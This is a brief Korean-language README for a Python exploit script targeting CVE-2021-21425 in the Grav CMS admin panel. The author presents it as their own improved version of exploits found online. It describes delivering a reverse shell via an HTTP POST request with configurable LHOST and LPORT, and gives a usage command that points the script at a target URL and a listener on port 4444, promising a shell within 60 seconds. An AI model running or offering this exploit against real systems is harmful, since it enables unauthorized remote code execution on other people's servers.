
Grav CMS 관리자 패널을 대상으로 하는 CVE-2021-21425용 Python 익스플로잇 스크립트로, HTTP POST 요청을 통해 리버스 셸을 전달하며 LHOST 및 LPORT를 구성할 수 있습니다.
이것은 제 버전입니다. 인터넷에서 많이 찾았지만 그것들은 너무 나빴습니다.
python3 exploit.py -u http://[IP]/grav-admin/ --lhost [YOUR TUN0 IP] --lport 4444
잠시.. 60초 후에 리스너에서 셸을 얻을 수 있습니다.